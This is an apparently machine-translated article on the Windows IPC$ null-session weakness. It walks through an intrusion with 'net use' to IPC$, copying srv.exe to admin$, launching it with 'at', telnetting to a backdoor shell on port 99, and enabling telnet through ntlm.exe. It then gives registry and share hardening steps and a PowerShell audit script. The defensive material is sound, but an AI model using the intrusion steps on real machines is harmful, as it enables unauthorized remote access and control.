Deny hackers from spying on IPC$: uncovering the vulnerability

Source: Internet
Author: User
Tags: net time

I often hear people talk about the IPC$ vulnerability on the Internet. What is the IPC$ vulnerability, and how do network hooligans exploit it? With that question in mind, let's take a look at the author's article.

What is an IPC$ vulnerability?

IPC$ is a share that exposes named pipes and is important for inter-process communication. It is used to remotely manage computers and view their shared resources. Using IPC$, we can establish a null connection with the target host (without a user name or password). Using this null connection, we can also obtain the user list on the target host. People with ulterior motives, however, use IPC$ to enumerate our user list and then use dictionary tools to attack our host.

How IPC$ vulnerabilities are exploited

Attackers usually use the software "streamer" here. The rabbit reminds you that "streamer" is a very powerful piece of software and must be used with care; illegal destruction is prohibited!

Step 1: Run streamer (the latest version is 4.6) and press CTRL + R to bring up the scan box. Here we will just perform a test; the purpose is to show you the hazards of this vulnerability. Therefore, we select a single IP address for scanning. We scanned 127.0.0.1 (). The default value is used for all other items, and you do not need to change the settings.

Step 2: Open the command line that comes with Win2000. Note: we are not here to teach you how to destroy, but to introduce the hazards of this vulnerability, so the following IP address is assumed and does not exist.

1. C:\> net use \\127.0.0.1\IPC$ "" /user:"administrators"

This is an IP address where streamer found that the user name is "administrators" and the password is empty. An attacker would use this command to establish a connection with 127.0.0.1. Because the password is empty, the first pair of quotation marks encloses nothing; the user name goes inside the second pair of quotation marks, here administrators.

2. C:\> copy srv.exe \\127.0.0.1\admin$

First copy srv.exe, which is available in the Tools directory of streamer (here admin$ refers to the admin user's c:\winnt\system32; you can also use c$ or d$, which mean drive C and drive D, depending on where you want to copy it).

3. C:\> net time \\127.0.0.1

Check the time; the current time of 127.0.0.1 is . The command completed successfully.

4. C:\> at \\127.0.0.1 11:05 srv.exe

Use the at command to start srv.exe (the time set here must be slightly ahead of the host's current time, or how else would it start!).

5. C:\> net time \\127.0.0.1

Check the time again. Once the current time of 127.0.0.1 is , prepare to run the following command.

6. C:\> telnet 127.0.0.1 99

The telnet command is used here. Note that the port is 99: Telnet uses port 23 by default, but srv creates a shell on port 99 for us on the other computer.

Although we can telnet in, srv is one-shot: it would have to be activated again for the next login. So we plan to set up a Telnet service instead, and this requires ntlm.

7. C:\> copy ntlm.exe \\127.0.0.1\admin$

Use the copy command to upload ntlm.exe (ntlm.exe is also in the Tools directory of streamer).

8. C:\WINNT\system32> ntlm

Enter ntlm to start it (here C:\WINNT\system32> refers to the peer computer; running ntlm actually makes the program run on the peer computer). When "DONE" appears, it has started normally. Then use "net start telnet" to enable the Telnet service!

Step 3: Use Telnet to connect to the peer computer with telnet 127.0.0.1, and enter the user name and password. The operation is as simple as working in DOS!

How to prevent IPC$ vulnerabilities

After reading the above method, don't you think you should check whether you have this vulnerability? And if so, shouldn't you fix it? Follow along: here we will teach you how to prevent intrusion through IPC$ vulnerabilities.

1. Do not allow null connections

First, run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] and change the value RestrictAnonymous (DWORD) to 00000001.

2. Disable the administrative shares

Also, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value AutoShareServer (DWORD) to 00000000.

3. Go to www.heibai.net/download/show.php? Id1_2194&down00001download and download deldemo.zip. This tool consists of two batch files that automatically and permanently delete all of the shares Windows 2000 creates by default.

4. If you still find this troublesome, you can also put "net share ipc$ /delete" in your Startup folder.

5. Of course, the simplest method is to make your password more complex, so that malicious people cannot crack it with tools. However, I would like to remind you that any password, however complex, may eventually be cracked.
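As an added example (not from the original article), the PowerShell script below audits the two registry settings recommended above and, when run with -Fix, applies them, then lists the hidden administrative shares that are still exported. It assumes an elevated prompt on a current Windows host where Get-SmbShare exists (on Windows 2000 the same keys apply, but use "net share" to list shares), and on workstation editions the second value is AutoShareWks rather than AutoShareServer.

```powershell
<#
 Added example, not from the original article: audit (and with -Fix, apply) the
 RestrictAnonymous and AutoShareServer hardenings, then show remaining admin shares.
 Assumes an elevated prompt and the SmbShare module (Windows 8 / Server 2012 or later).
#>
param([switch]$Fix)

# Registry values named in the article, with the hardened value for each.
# Note: on workstation editions the share setting is AutoShareWks, not AutoShareServer.
$Settings = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RestrictAnonymous'; Wanted = 1 }     # 1: refuse anonymous enumeration
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'AutoShareServer'; Wanted = 0 }       # 0: do not recreate ADMIN$/C$ at boot
)

foreach ($s in $Settings) {
    # A missing value is reported as 'absent' and counts as weak (the default applies).
    $item = Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue
    $current = if ($null -eq $item) { 'absent' } else { $item.($s.Name) }
    $state = if ($current -eq $s.Wanted) { 'OK' } else { 'WEAK' }
    '{0,-18} current={1,-6} wanted={2} [{3}]' -f $s.Name, $current, $s.Wanted, $state

    if ($Fix -and $state -eq 'WEAK') {
        # -Force creates the DWORD if it is absent and overwrites it otherwise.
        New-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Wanted `
            -PropertyType DWord -Force | Out-Null
        '{0,-18} set to {1}' -f $s.Name, $s.Wanted
    }
}

# Shares whose name ends in $ are hidden administrative shares (IPC$, ADMIN$, C$ ...).
# IPC$ is required for normal SMB operation; ADMIN$ and the drive shares are the ones
# the article removes. A reboot is needed before AutoShareServer takes effect.
Get-SmbShare | Where-Object { $_.Name -like '*$' } |
    Select-Object Name, Path, Description | Format-Table -AutoSize
```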
